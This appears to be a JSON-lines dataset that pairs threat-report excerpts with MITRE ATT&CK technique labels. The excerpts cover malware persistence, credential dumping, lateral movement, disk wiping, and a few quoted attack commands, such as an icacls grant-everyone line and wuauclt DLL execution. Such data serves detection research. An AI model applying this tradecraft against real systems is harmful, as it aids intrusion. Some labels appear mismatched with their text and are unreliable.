{"text1":"Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. Running in RAM Cobalt Strike modules aren't stored in the file system; their executable code can only be found in RAM. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. The goal is to set the startup path to the executable file or program code, launching it with the powershell.exe shell command to access the Internet resource specified in the code in order to download and install Cobalt Strike module. Bypassing network security Cobalt Strike allows users to install two types of modules: HTTP\/HTTPS\/DNS modules and SMB modules. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP\/HTTPS\/DNS module. The Cobalt Strike module can use several profiles and switch between data exchange methods on command from the C&C server without the need to update the module. Connect to another computer using PsExec.exe (the remote access program is included in the Microsoft SysInternals suite), copy the module, and run it; delete the module. Use of standard tools Cobalt Strike is publicly accessible, and can be downloaded in order to learn and create detection rules on the network. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed","labels":"['T1219']"}
{"text1":"A configuration file resides in a file under the backdoor\u2019s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values \u20180\u2019 or \u20181\u2019 and also adds itself to the configuration file. Other than the state command, all commands in the configuration file are identified by their hash\u2019s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it","labels":"['T1547.001']"}
{"text1":"The payload contains an exploit for the unpatched local privilege escalation vulnerability CVE-2015-1701 in Microsoft Windows. The exploit uses CVE-2015-1701 to execute a callback in userspace. The callback gets the EPROCESS structures of the current process and the System process, and copies data from the System token into the token of the current process. Upon completion, the payload continues execution in usermode with the privileges of the System process","labels":"['T1134.001']"}
{"text1":"Several days after that, on July 10, 2020, the attackers connected to the router via SSH and set up the PuTTy PSCP (the PuTTY Secure Copy client) utility on one of the infected machines. This utility was used to upload malware to the router VM. This enabled the attackers to place malware onto systems in the restricted segment of the enterprise network, using the router to host the samples. In addition, malware running in the network\u2019s restricted segment was able to exfiltrate the collected data to the command-and-control server via the Apache server set up on the same router","labels":"['T1021.004']"}
{"text1":"If the process is running with Low integrity, REvil terminates the current process and launches another instance of itself via ShellExecute using the \"runas\" command, which executes the new instance with administrative rights","labels":"['T1134.002']"}
{"text1":"A Web Shell is a file containing backdoor functionality written in a web scripting language such ASP, ASPX, PHP or JSP. When a web shell is hosted on an internet facing victim system, an adversary can remotely access the system to perform malicious actions. Deep Panda is a China based threat group CrowdStrike has observed targeting companies in the defense, legal, telecommunication and financial industries. Crowdstrike has observed Deep Panda adopting web shells as their primary access back into a victim organization. This is an interesting shift as web shells have typically been seen as only a first stage into obtaining a persistent foothold in an environment. Previously, web shells were quickly abandoned once persistent second stage malware was successfully beaconing. Using a web shell as a primary backdoor gives Deep Panda several advantages","labels":"['T1505.003']"}
{"text1":"The RDAT sample with the novel EWS C2 channel also had HTTP and DNS tunneling as C2 channels as well, which are very similar to other RDAT samples we collected. The HTTP C2 channel uses HTTP POST requests to transmit data to the C2 server","labels":"['T1030']"}
{"text1":"We have identified 127 different domains used to host Silent Librarian phishing sites since 2013. Like a growing number of phishing sites, domains registered by Silent Librarian generally use Freenom top-level domains (TLDs) (.TK, . CF, .GA, .GQ, .ML) because they are available at no cost. The group has used domains on other TLDs, though rather sparingly. Some of the other recent TLDs associated with Silent Librarian domains include .IN, .IR, .INFO, .LINK, and .TOP","labels":"['T1583.001']"}
{"text1":"One of the Cl0p variants encrypts the files by generating an RSA public key, retrieving its first 127 bytes and using them as the RC4 key, adding the Cl0p^_- header and the RC4 encrypting it again. Once the files are encrypted, the Cl0p extension will be added to each encrypted file","labels":"['T1486']"}
{"text1":"The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings","labels":"['T1082']"}
{"text1":"Additionally, Microsoft warned that this vulnerability could be used in the crafting of a wormable exploit. The Common Vulnerabilities and Exposures (CVE) site references this vulnerability as CVE-2008-4250","labels":"['T1210']"}
{"text1":"Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container. More specifically, it links its local containerized X drive to the host\u2019s C drive","labels":"['T1611']"}
{"text1":"To check the host language, it queries the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language\\ and the value InstallLanguage. If the machine has the value 0419 (Russian), 0422 (Ukrainian) or 0423 (Belarusian), it call ExitProcess\u00a0to stop executing","labels":"['T1614.001']"}
{"text1":"A custom executable that only contains the Metasploit shellcode. This is used to maintain access to a Meterpreter session. It is saved to C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\msupdateconf.exe, granting the executable persistence. Another custom executable used to execute PowerShell scripts. The Mosquito JScript backdoor that uses Google Apps Script as its C&C server. Privilege escalation using the Metasploit module ext_server_priv.x86.dll [8","labels":"['T1059.001']"}
{"text1":"After initialization, the code monitors browser activities, looking for online banking sessions. Once these are found, the malware enables the attacker to display an overlay window in front of the victim\u2019s browser to manipulate the user\u2019s session in the background. In this way, the fraudulent transaction is performed from the victim\u2019s machine, making it harder to detect for anti-fraud solutions on the bank\u2019s end. The criminal can also request specific information, asked during the bank transaction, such as a secondary password and token, bypassing two-factor authentication solutions adopted by the financial sector","labels":"['T1185', 'T1185']"}
{"text1":"All the text files are now packed into the archive temp.zip (%temp%\\temp.zip) - zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt - txt is uploaded to the control server","labels":"['T1560', 'T1074.001']"}
{"text1":"Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks . Get Free Account . Join Now . Introduction . TeamTNT is a cybercrime group that targets cloud environments including Docker and Kubernetes instances. TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims\u2019 servers. The uniqueness of the recent attack observed by Intezer is the group abuses a legitimate open source tool called Weave Scope to gain full control over the victim\u2019s cloud infrastructure. By installing a legitimate tool such as Weave Scope the attackers reap all the benefits as if they had installed a backdoor on the server, with significantly less effort and without needing to use malware. To install Weave Scope on the server the attackers use an exposed Docker API port and create a new privileged container with a clean Ubuntu image. Once installed, the attackers can connect to the Weave Scope dashboard via HTTP on port 4040 and gain full visibility and control over the victim\u2019s infrastructure. To protect yourself from this attack we recommend to: - Close exposed Docker API ports: This attack takes advantage of a common misconfiguration of the Docker API which gives the attacker full control over the Docker service. Therefore, Docker API ports should be closed or contain restricted access policies in the firewall. Block incoming connections to port 4040: Weave Scope uses default port 4040 to make the dashboard accessible and anyone with access to the network can view the dashboard. Update from Weave Works . Weave Works has since provided this in-depth article on how to prevent malicious attacks using Weave Scope","labels":"['T1133']"}
{"text1":"As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. After a few minutes, execute the malicious file on the system. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Use an advanced endpoint threat detection (AETD) solution to monitor activity on network endpoints. Also implement strict security controls for privileged accounts such as Active Directory administrator to prevent access by an unauthorized user","labels":"['T1036.005']"}
{"text1":"Upon initial execution, the Windows Registry is checked to determine if DarkWatchman has already been installed. The malware stores its configuration in \u2018\\\\HKCU\\Software\\Microsoft\\Windows\\DWM\\\u2018, using registry keys that consist of a uid generated from the serial number of the C: drive and appended with a single digit or character. Installation is denoted by uid + 0 (eg: abc1230) \u2013 if the malware does not find a \u20181\u2018 flag in this key, it runs its install function","labels":"['T1012']"}
{"text1":"This variant uses an 8-byte XOR key to obfuscate API names and other strings within the payload (Figure 5). Figure 5: 8-Byte XOR Key for obfuscation","labels":"['T1027']"}
{"text1":"TrailBlazer is a sophisticated malware family that provides modular functionality and a very low prevalence. TrailBlazer persists on a compromised host using WMI event subscriptions4 \u2014 a technique also used by SeaDuke \u2014 although this persistence mechanism is not exclusive to COZY BEAR.5","labels":"['T1001.001']"}
{"text1":"A key trait of NOBELIUM\u2019s ongoing activity over the last year has been the abuse of indirect paths and trust relationships to target and gain access to victims of interest for intelligence gain. In the most recent campaign, this has manifested in a compromise-one-to-compromise-many approach\u2014exploiting the service providers\u2019 trust chain to gain broad access to multiple customer tenants for subsequent attacks. NOBELIUM leverages established standard business practices, to target downstream customers across multiple managed tenants. These delegated administrative privileges are often neither audited for approved use nor disabled by a service provider or downstream customer once use has ended, leaving them active until removed by the administrators. If NOBELIUM has compromised the accounts tied to delegated administrative privileges through other credential-stealing attacks, that access grants actors like NOBELIUM persistence for ongoing campaigns","labels":"['T1199']"}
|
|
{"text1":"To avoid being run in sandboxes and emulators, all MegaCortex versions implement file encryption threading based on querying for the number of CPUs in the system. All MegaCortex versions can detect if the binary is running with administrator privileges","labels":"['T1497.001']"}
|
|
{"text1":"GALLIUM primarily relies on compromised domain credentials to move through the target network, and as outlined above, uses several credential harvesting tools. Once they have acquired credentials, the activity group uses PsExec extensively to move laterally between hosts in the target network","labels":"['T1570']"}
|
|
{"text1":"Before being hashed, the character \u201c0\u201d or \u201c1\u201d is appended to the return value indicating root privileges. This clientID is stored in \/Library\/Storage\/File System\/HFS\/25cf5d02-e50b-4288-870a-528d56c3cf6e\/pivtoken.appex if the code runs as root, or in ~\/Library\/SmartCardsServices\/Technology\/PlugIns\/drivers\/snippets.ecgML otherwise. This file is normally hidden via the _chflags function and its timestamp is modified using the \u201ctouch \u2013t\u201d command with a random value","labels":"['T1070.006']"}
|
|
{"text1":"After dropping these files to its working directory, the malware attempts to change the attributes of all the files to \u201chidden\u201d and grant full access to all files in the current directory and any directories below. It does this by executing \u201cattrib +h .\u201d, followed by \u201cicacls . \/grant Everyone:F \/T \/C \/Q","labels":"['T1222.001']"}
|
|
{"text1":"The actors used valid credentials obtained\u00a0using\u00a0MimiKatz variants to escalate privileges. We\u2019ve observed Mimikatz being executed both from the file system of victim hosts and via PowerShell cmdlets executed via Cobalt Strike BEACON. Actors have gained access to credentials via exported copies of\u00a0the ntds.dit\u00a0Active Directory database and SYSTEM and SECURITY\u00a0registry hives from a Domain Controller","labels":"['T1003.003']"}
|
|
{"text1":"We analyzed a new RATANKBA variant that uses a PowerShell script instead of its more traditional PE executable form","labels":"['T1059.001']"}
|
|
{"text1":"The story of a Linux miner bundled with pirated copies of VST (Virtual Studio Technology) software for Windows and macOS","labels":"['T1189']"}
|
|
{"text1":"FIVEHANDS can receive a CLI argument for a path; this limits the ransomware's file encryption activities to the specified directory. DEATHRANSOM and HELLOKITTY do not accept CLI arguments","labels":"['T1059']"}
|
|
{"text1":"TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. We believe that this was used to execute a customized Cobalt Strike BEACON","labels":"['T1027', 'T1140']"}
|
|
{"text1":"However the application is not a service of Yahoo or a legitimate product of McAfee, but a rogue application used by Pawn Storm. Clicking on the \u201cAgree\u201d button would give Pawn Storm an OAuth token and access to the targets\u2019 mailbox. The group then gains access to the mailbox until the token gets revoked by the service provider or the target","labels":"['T1550.001']"}
|
|
{"text1":"If this function is successfully loaded, it will ultimately spawn a new instance of itself with the Rundll32Call export via a call to rundll32.exe. The Rundll32Call exported function begins by creating a named event named \u2018RunOnce\u2019. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. This ensures that only a single instance of DDKong is executed at a given time. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3","labels":"['T1218.011']"}
|
|
{"text1":"Command_Create&Inject: This command creates a new process (using a supplied filename as the process name) and then injects malicious code into it","labels":"['T1055']"}
|
|
{"text1":"In order to encrypt network shares, BitPaymer will attempt to enumerate the sessions for each user logged onto the infected host and create a new process, using the token of each user. For each host, BitPaymer spawns another net.exe process with command net view <host> using the newly discovered host as a parameter. This will return a list of network shares available to the impersonated user on the host. Once a list of all available shares has been gathered, BitPaymer attempts to mount them to be encrypted","labels":"['T1087.001']"}
|
|
{"text1":"The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script \u201csymantec_help.jsp\u201d contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access","labels":"['T1036']"}
|
|
{"text1":"This file is a USB file stealer, which can also be guessed from its internal name \"USBgrabber.dll\". However, the implementation is sloppy, which makes it a file stealer for any newly connected logical volume on a system. This is because the malware monitors the computer for the messages WM_COMMAND and WM_DEVICECHANGE, but does not verify that a USB drive was connected","labels":"['T1025']"}
|
|
{"text1":"The job of the smaller of the two JavaScripts is to establish a system autostart mechanism. It accomplishes this by deobfuscating another script, link.js, into %TMP%. Link.js in turn creates a shortcut file \"Java(TM) Platform SE Auto Updater.lnk\" in the \"Startup\" special folder pointing to the main backdoor JavaScript","labels":"['T1547.001', 'T1547.009']"}
|
|
{"text1":"After the deletion process, the malware gets the function \u201cWow64RevertWow64FsRedirection\u201d using the function \u201cGetProcAddress\u201d and calls it in a dynamic way to leave the system in the same state as before","labels":"['T1070']"}
|
|
{"text1":"The \"Office Test\" persistence mechanism allows threat actors to execute a Trojan each time a user runs any of the Office applications. This persistence mechanism loads a malicious DLL by leveraging a registry key that appears to be used during the development and testing of Microsoft Office applications. The use of this registry key for persistence is quite clever, as it requires user interaction to load and execute the malicious payload, which makes automated analysis in sandboxes challenging. Low awareness of this persistence method, coupled with the sandbox evasion obtained from user interactions, makes this a potentially attractive persistence method that we believe may be used in future attacks. Unit 42 suggests monitoring for systems that have this registry key already created, as it is possible a threat is already using the key for persistence purposes. Microsoft has added the \u201cOffice Test\u201d registry keys to its Autoruns tool for detection purposes as well. Also, we suggest disabling this persistence method by creating the \u201cOffice test\u201d registry key in read-only mode as outlined in this blog","labels":"['T1137.002']"}
|
|
{"text1":"The malware performs COM hijacking by setting the path to itself to the HKCU\\Software\\Classes\\Folder\\shell\\open\\command key with a DelegateExecute parameter","labels":"['T1546.015']"}
|
|
{"text1":"The plugin begins by collecting the username of the running process, and determining if it is running under the SYSTEM account. If running as SYSTEM, the plugin will associate the active desktop with the plugin\u2019s thread","labels":"['T1033']"}
|
|
{"text1":"Figure 5: Registry Activity The script then determines the version of Powershell that is being used on the infected system. If the switch associated with the execution of Stage 3 was passed to the 'pre_logic' function at the beginning of this stage, the Stage 3 payload will then be executed immediately","labels":"['T1564.004']"}
|
|
{"text1":"When executed, Kwampirs decrypts and extracts a copy of its main DLL payload from its resource section. Before writing the payload to disk, it inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections","labels":"['T1140', 'T1027.001']"}
|
|
{"text1":"This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw","labels":"['T1220']"}
|
|
{"text1":"An additional batch script named \u201cdirsb.bat\u201d was used to gather folder and file names from hosts on the network","labels":"['T1083']"}
|
|
{"text1":"The malware can be instructed to search for recently-used documents or other interesting files. It can monitor specific directories and removable devices, report any changes and exfiltrate files of the attackers\u2019 choice","labels":"['T1083']"}
|
|
{"text1":"The WhiteBear binary loader maintains several features including two injection methods for its (oddly named) \u201cKernelInjector\u201d subsystem, also named by its developer \u2013 Standart \u2013 WindowInject (includes an unusual technique for remotely placing code into memory for subsequent thread execution","labels":"['T1055.003']"}
|
|
{"text1":"The malware then focuses on corrupting the first 512 bytes, the Master Boot Record (MBR) for every Physical Drive. While that should be enough for the device not to boot again, HermeticWiper proceeds to enumerate the partitions for all possible drives","labels":"['T1561.002']"}
|
|
{"text1":"The lnk file (WindowsUpdateConf.lnk) executes \u201cC:\\Windows\\system32\\wuauclt.exe\u201d \/UpdateDeploymentProvider C:\\W\u00edndows\\system32\\wuaueng.dll \/RunHandlerComServer. This is an interesting technique used by Lazarus to run its malicious DLL using the Windows Update Client to bypass security detection mechanisms","labels":"['T1218']"}
|
|
{"text1":"While the most recent samples observed still use batch scripts and SFX files, the Gamaredon Group has moved away from applications like wget, Remote Manipulator Tool, VNC and ChkFlsh.exe. Instead of using wget the attackers are distributing custom developed downloaders, and instead of Remote Manipulator or VNC the malware is using a custom developed remote access implant","labels":"['T1059.003']"}
|
|
{"text1":"One of the documents is called \u201c\u0647\u0645\u0628\u0633\u062a\u06af\u06cc \u0639\u0627\u0634\u0642\u0627\u0646\u0647 \u0628\u0627 \u0639\u0627\u0634\u0642\u0627\u0646 \u0622\u0632\u0627\u062f\u06cc2.doc\u201d (translates from Persian as \u201cRomantic Solidarity With Lovers of Freedom2.doc\u201d) and contains malicious macros that are accompanied by an odd decoy message attempting to convince the victim to enable its content","labels":"['T1204.002']"}
|
|
{"text1":"Once the attacker gained access to the network with compromised credentials, they moved laterally using multiple different credentials. The credentials used for lateral movement were always different from those used for remote access","labels":"['T1078']"}
|
|
{"text1":"The OilRig group maintains their persistent attacks against government entities in the Middle East region using previously identified tools and tactics. In this instance a spear phishing email was used containing a lure designed to socially engineer and entice the victim into executing a malicious attachment. The attachment was identified as a variant of the OopsIE trojan we identified in February 2018. In this iteration of OopsIE, the general functionality largely remained the same but contained the addition of anti-analysis and anti-virtual machine capabilities to further evade detection from automated defensive systems. Attack Details In July 2018, we reported on a wave of OilRig attacks delivering a tool called QUADAGENT involving a Middle Eastern government agency. During that wave, we also observed OilRig leveraging additional compromised email accounts at the same government organization to send spear phishing emails delivering the OopsIE trojan as the payload instead of QUADAGENT. The OopsIE attack also targeted a government agency within the same nation state, though a different organization than the one targeted with QUADAGENT. The email subject was in Arabic, which translated to \u201cBusiness continuity management training\u201d. The email was sent to an address belonging to a user group, rather than a specific individual\u2019s email address. Evasion Techniques The OopsIE variant delivered in this attack begins its execution by performing a series of anti-VM and sandbox checks. If any of the checks described in Table 1 are successful, the Trojan will exit without running any of its functional code","labels":"['T1497.001']"}
|
|
{"text1":"This function converts the given domain to \u201cbackdoor\u201d, which can be used to login to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor","labels":"['T1484']"}
|
|
{"text1":"We believe that the injected script came from the Andariel group since the code has similar obfuscation and structure to the sample we previously found from them. The script was used to collect information from visitors\u2019 browser: browser type, system language, Flash Player version, Silverlight version, and multiple ActiveX objects","labels":"['T1592.002']"}
|
|
{"text1":"As you can see from the VBScript file, the commands in the script are invoked using the wscript shell. It does two things: first, it creates a \u201cRunOnce\u201d key in the registry so that the VBScript is executed each time the user logs on to the machine (indicating persistence) and second, the VBScript runs the executable file \u201cfirefox.exe","labels":"['T1547.001']"}
|
|
{"text1":"The task is used to start an IronPython script with the 64-bit version of the interpreter. However, the key didn\u2019t decrypt on any of the embedded files in the scripts we found. The task\u2019s description is PythonUpdateSrvc and it runs either on Windows startup when a user logs in or when one of two system events get created","labels":"['T1053.005']"}
|
|
{"text1":"Modify the shortcut that launches Telegram by replacing its path to the one corresponding to \u2018exe\u2019, as outlined below","labels":"['T1518', 'T1547.009']"}
|
|
{"text1":"We also identified a Tomiris variant (internally named \u201cSBZ\u201d, MD5 51AA89452A9E57F646AB64BE6217788E) which acts as a filestealer, and uploads any recent file matching a hardcoded set of extensions (.doc, .docx, .pdf, .rar, etc.) to the C2","labels":"['T1041']"}
|
|
{"text1":"The loader performs a last check to ensure that the operating system's keyboard and language settings are not set to Russian and creates a mutex with a hardcoded name \u2018ld_201127\u2019. The latter is to avoid double execution of its own instance","labels":"['T1614.001']"}
|
|
{"text1":"The phishing messages were found to contain a Microsoft Word document attachment that uses VBA macros to install\u202fLookBack\u00a0malware. When the attachment is executed, the malicious VBA macro within the Microsoft Word attachment drops three Privacy Enhanced Mail (PEM) files to the host: tempgup.txt, tempgup2.txt, and tempsodom.txt. Additionally, the file\u202fTemptcm.tmp,\u202fwhich is a version of certutil.exe,\u202fis dropped to decode the PEM files using\u202fTemptcm.tmp. The macro next creates a copy of the decoded PEM files restoring their proper file extensions with the Windows essentuti.exe. Finally, the macro launches GUP.exe and the libcurl.dll loader separately, resulting in the execution of\u202fLookBack\u202fmalware","labels":"['T1059.005']"}
|
|
{"text1":"The payload file also checks for the Logmein event log in an attempt to encrypt files in remote machines or servers connected to the victim\u2019s machine. The path to the log file is hard-coded in the payload file, as shown here","labels":"['T1219']"}
|
|
{"text1":"Here, we show an example of a PDF campaign as seen from the point of view of the affected user. This malicious PDF only contains a URL to entice the user to view the file. If the user chooses to click on the URL link and to read the actual content of the file, the browser will open a legitimate Google location which will redirect the browser to a malicious document. Browser redirection Finally, the malicious Word document is opened and the VBA macro code is run after the user allows for the editing of the content within Word. This eventually kickstarts the rest of the infection chain, terminates the Word process to hide the original file and opens a new Word instance to display a non-malicious decoy document dropped to the disk drive by one of the previous stages. Malicious Word document The decoy document remains constant throughout the campaign and is likely a side effect of the Threadkit exploit toolkit and cannot be relied upon for attribution. Decoy document opened in Word","labels":"['T1059.005']"}
|
|
{"text1":"It then allocates a buffer with PAGE_EXECUTE_READWRITE protection to store the decrypted code. After the buffers are allocated, the packer checks if a string argument, which will be used as a decryption key, was passed to the AddByGod function. Next, the packer uses the AES256 algorithm with a SHA1 derived key of the passed argument to decrypt the encrypted code. If the decryption is successful, the decrypted code is executed and a second stage payload runs. Luckily, we managed to obtain the password that was needed to execute the binary and decrypt the encrypted payload","labels":"['T1140']"}
|
|
{"text1":"It also turns off the Windows Security Center service to prevent alerting the user about the disabled firewall","labels":"['T1562.001']"}
|
|
{"text1":"Further into the infection process, the malware chooses a service name randomly from netsvc in order to use it for the payload creation path. The malware then creates a file named bcdbootinfo.tlp in the system folder containing the infection time and the random service name that is chosen","labels":"['T1036.005']"}
|
|
{"text1":"AQUATIC PANDA continued their reconnaissance from the host, using native OS binaries to understand current privilege levels as well as system and domain details","labels":"['T1082']"}
|
|
{"text1":"While the logo and commands are identical to the original hacktool, the name was changed to OrangeTeghal. To evade security software while deploying this tool on compromised systems, the attackers use a technique revealed at Black Hat EU \u201817 in the presentation Lost in Transaction: Process Doppelg\u00e4nging. Process Doppelg\u00e4nging uses NTFS transactions to modify the executable of a seemingly benign process that is suspended right after creation","labels":"['T1055.013']"}
|
|
{"text1":"Talos has identified two different infection vectors associated with this particular campaign. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. In the first scenario, Talos discovered a document named \"MinutesofMeeting-2May19.docx\", that appeared to display the national flag of Jordan","labels":"['T1059.003']"}
|
|
{"text1":"ScreenCapture: It takes screenshots of the infected machine - Download Secondary Payloads: It downloads additional plugins and other malware - Enterprise-aware: It targets administrators and enterprise networks - Infiltrates the Exchange Server: It collects and steals sensitive information from the Microsoft Exchange mail system, including credentials and the domain certificate","labels":"['T1114.002']"}
|
|
{"text1":"Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9. This document contains an in-line link to a URL hosting a malware payload. When clicked, these links download malware binaries with file names masquerading as document files. In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In addition to the use of\u00a0common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under control of the actors behind TrickBot. The attackers have employed\u00a0Cobalt Strike payloads crafted to maintain persistence through reboot via\u00a0a\u00a0scheduled task\u00a0on critical systems in victim environments. In addition to the use of\u00a0common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP\u00a0and SMB protocols. The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files. Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\\Windows\\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\\Windows\\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static","labels":"['T1036.004']"}
|
|
{"text1":"X-Force IRIS found that the SDBbot RAT installers are x64-packed and decrypt parts of SDBbot\u2019s code and strings upon execution. In addition, they read a binary blob located within the registry HKLM\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\[3 characters]\\[1 character]. Depending on user privileges, a binary blob is located in the registry value. If running with regular user privileges, the installer component will establish persistence using the registry Run key and execute ordinal #1 of the DLL","labels":"['T1547.001']"}
|
|
{"text1":"In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. Additionally, the process attempts to lower the overall security of the system by disabling security features in Microsoft Office and Windows Defender","labels":"['T1562.001']"}
|
|
{"text1":"Following the reconnaissance phase, the threat actor attempted to dump credentials stored on the compromised machines. The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes. The dumped hashes were used to authenticate to other machines via pass the hash","labels":"['T1550.002']"}
|
|
{"text1":"The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks. It appears the purpose of the new Disttrack samples was solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016\/11\/17 20:45. Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment. The dropper then attempts to open the service manager on each remote system to start the RemoteRegistry service, which it will connect to using RegConnectRegistryW. The dropper then checks to see if it has administrator privileges on the remote system by attempting to open \"\\system32\\csrss.exe\", which allows it to determine if it can write its payload to the \"\\system32\" folder on the remote system. Scheduled tasks require a time in which the task will run, which the dropper determines by calling the function NetRemoteTOD to obtain the time of day from the remote system. While completely speculative, the word \u201cshinu\u201d used as a parameter could be a reference to the Arabic slang for the word \u201cwhat\u201d, as well as a reference to a village name in northwestern Iran. It appears that the \u201cdrdisk.sys\u201d driver (SHA256: 4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6) is the exact same driver as used in the Shamoon attack in 2012. During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. The current attack campaign has several TTP overlaps with the original Shamoon campaign, especially from a targeting and timing perspective","labels":"['T1036.004']"}
|
|
{"text1":"Finally, the payloads were almost never repeated. The threat actor made sure that each payload had a unique hash, and some payloads were packed using different types of packers, both known and custom","labels":"['T1027.005', 'T1027.002']"}
|
|
{"text1":"txt,log} and is also a \"cryptojacker,\" which is a tool that uses a victim\u2019s computer to mine cryptocurrency. Nirsoft SniffPass is capable of obtaining passwords sent over non-secure protocols","labels":"['T1040']"}
|
|
{"text1":"websites visitors have a higher likelihood to be targets of interest) - Add one or more webshell backdoors to victim websites to maintain persistence - Webshell used to add JavaScript developed by OceanLotus into the website - The malicious JavaScript makes calls over HTTP or HTTPS to attacker controlled domains to typically load one of two different OceanLotus frameworks - OceanLotus JavaScript frameworks designed to track, profile, and target the compromised website's visitors - Website visitors of interest are flagged for targeting and receive special JavaScript aimed at compromising the user's system or e-mail accounts","labels":"['T1071.001']"}
|
|
{"text1":"Following a series of denial-of-service attacks and website defacements, the new destructive malware corrupts the master boot record (MBR), partition and file system of all available physical drives on Windows machines","labels":"['T1561.002']"}
|
|
{"text1":"On October 31, TA505 sent two campaigns, both using .lnk files embedded in Microsoft Word documents. As shown in Figure 4, recipients must open the attached Word document, enable editing, and then execute the .lnk file by double clicking an image in the document. They must further confirm that they want to open the .lnk file (Figure 5), which, in turn, downloads an intermediate downloader. Despite the number of steps involved, TA505 relies on light social engineering in the email and lure as well as end user conditioning to proceed through the scheme and infect their PC with malware","labels":"['T1204.002']"}
|
|
{"text1":"UNC2465 used phishing emails and legitimate services to deliver the SMOKEDHAM backdoor. SMOKEDHAM is a .NET backdoor that supports keylogging, taking screenshots, and executing arbitrary .NET commands. During one incident, the threat actor appeared to establish a line of communication with the victim before sending a malicious Google Drive link delivering an archive containing an LNK downloader. More recent UNC2465 emails have used Dropbox links with a ZIP archive containing malicious LNK files that, when executed, would ultimately lead to SMOKEDHAM being downloaded onto the system. UNC2465 has used Advanced IP Scanner, BLOODHOUND, and RDP for internal reconnaissance and lateral movement activities within victim environments. The threat actor has used Mimikatz for credential harvesting to escalate privileges in the victim network. UNC2465 also uses the publicly available NGROK utility to bypass firewalls and expose remote desktop service ports, like RDP and WinRM, to the open internet. Mandiant has observed the threat actor using PsExec and cron jobs to deploy the DARKSIDE ransomware. UNC2465 has called the customer support lines of victims and told them that data was stolen and instructed them to follow the link in the ransom note","labels":"['T1102']"}
|
|
{"text1":"The execution of the Powershell that is passed to IEX by the Stage 1 Word document is where we begin to observe several interesting activities occurring on an infected system. One is used to determine whether or not to achieve persistence for the next stage of the infection process on the target system. If persistence is selected the other switch defines whether or not the Stage 3 code should be executed once it is staged. If the option to achieve persistence was selected when the 'pre_logic' function was called, the function will then query the infected system to determine how to best achieve persistence. Depending on the access rights of the user account within which the malware is operating, the malware will then query registry paths that are commonly used by malware to achieve persistence. If operating under an account with Administrator access to the system the script will query and set","labels":"['T1547.001']"}
|
|
